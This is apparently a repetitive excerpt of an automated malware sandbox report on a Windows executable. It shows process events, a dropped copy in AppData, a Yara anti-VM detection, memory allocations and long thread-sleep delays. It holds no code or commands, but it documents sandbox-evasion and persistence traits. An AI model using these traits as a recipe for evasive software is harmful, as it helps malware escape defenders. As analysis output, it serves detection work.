Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\dUENcAj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: 20250301_173245__p20250301_173245__p.exe PID: 7320, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: duencaj.exe PID: 4852, type: MEMORYSTR

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 1130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 2CD0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 12A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 8D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 9D80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 9F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: AF80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: CA0000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 2760000 memory reserve \| memory write watch
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Memory allocated: 4760000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: F50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 8710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 9710000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 98F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: A8F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 1580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Memory allocated: 1790000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599796
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599597
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599453
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599343
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599234
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599125
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 599011
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598906
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598793
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598679
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598577
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598468
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598356
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598240
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 598110
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597997
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597891
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597766
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597641
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597521
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597391
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597186
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 597072
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596841
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596732
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596624
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596515
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596406
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596296
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596185
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 596075
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595968
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595859
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595750
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595638
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595529
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595421
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595313
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 595078
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594969
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594844
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594483
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594250
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594125
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 594008
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 593904
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Thread delayed: delay time: 593797
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599875
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599765
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599653
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599534
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598313
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598203
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597969
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596966
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596856
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596536
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596231
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596125
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 596016
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595906
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595797
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595688
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595576
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595469
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 595110
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594985
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594860
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594735
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594610
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594485
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594360
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 594235
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593397
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593281
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 593162
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 592959
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Thread delayed: delay time: 592828

Source: C:\Windows\System\explorer.exe	Window / User API: threadDelayed 777	Jump to behavior
Source: C:\Windows\System\explorer.exe	Window / User API: threadDelayed 409	Jump to behavior
Source: C:\Windows\System\explorer.exe	Window / User API: foregroundWindowGot 997	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7873
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 551
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8991
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 499
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Window / User API: threadDelayed 4695
Source: C:\Users\user\Desktop\20250301_173245__p20250301_173245__p.exe	Window / User API: threadDelayed 5135
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Window / User API: threadDelayed 3429
Source: C:\Users\user\AppData\Roaming\duencaj.exe	Window / User API: threadDelayed 6393

